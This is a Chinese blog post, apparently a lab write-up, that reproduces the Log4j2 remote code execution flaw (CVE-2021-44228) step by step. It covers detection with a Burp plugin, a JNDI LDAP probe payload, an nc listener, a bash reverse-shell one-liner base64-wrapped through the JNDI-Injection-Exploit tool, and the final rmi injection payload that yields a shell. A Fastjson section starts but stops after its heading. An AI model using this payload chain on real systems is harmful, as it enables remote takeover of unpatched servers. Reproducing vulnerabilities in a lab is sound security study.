经典漏洞复现

经典漏洞复现

本次文章旨在应用对漏洞原理日后有时间再做深究

Log4j2远程命令执行(CVE-2021-44228)

漏洞发现

推荐使用bp的一个插件Log4j2Scan

项目地址:https://github.com/whwlsfb/Log4j2Scan

1701778718355

漏洞复现

通过bp插件发现漏洞点在http://192.168.10.120:58051/hello?payload=111这个页面,这个页面有很多触发点这里用的是?payload=这个传参点

1701787019035

首先用dnslog手动验证一下pyload:${jndi:ldap://dnslog.cn}

get传参还要进行url编码

1701787484971

1701787513433

成功验证传参点现在来到漏洞利用阶段尝试反弹shell

因为我是在内网搭的环境可以使用本机验证如果在公网的环境可以用自己的vps

首先用nc 监听一个端口 nc -lvvp 端口

1701788057653

然后要用到一个JNDI注入工具:JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

https://github.com/welk1n/JNDI-Injection-Exploit

先将这个命令输进行base64编码 bash -i >& /dev/tcp/ip/port 0>&1

1701788935898

然后将编码后的数据放在这个命令中 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,base64编码命令}|{base64,-d}|{bash,-i}" -A [vps ip]

1701796377046

我这里选择用第五个rmi://192.168.10.72:1099/tmtrzz

构造命令 ${jndi:rmi://192.168.10.72:1099/tmtrzz }

进行url编码传参

1701796522919

报错

1701796492789

发现是java版本太高将版本改到java8成功反弹shell

1701796802191

1701796867864

Fastjson反序列化漏洞

漏洞发现

通过bp插件


经典漏洞复现
http://example.com/2023/12/05/经典漏洞复现/
作者
John Doe
发布于
2023年12月5日
许可协议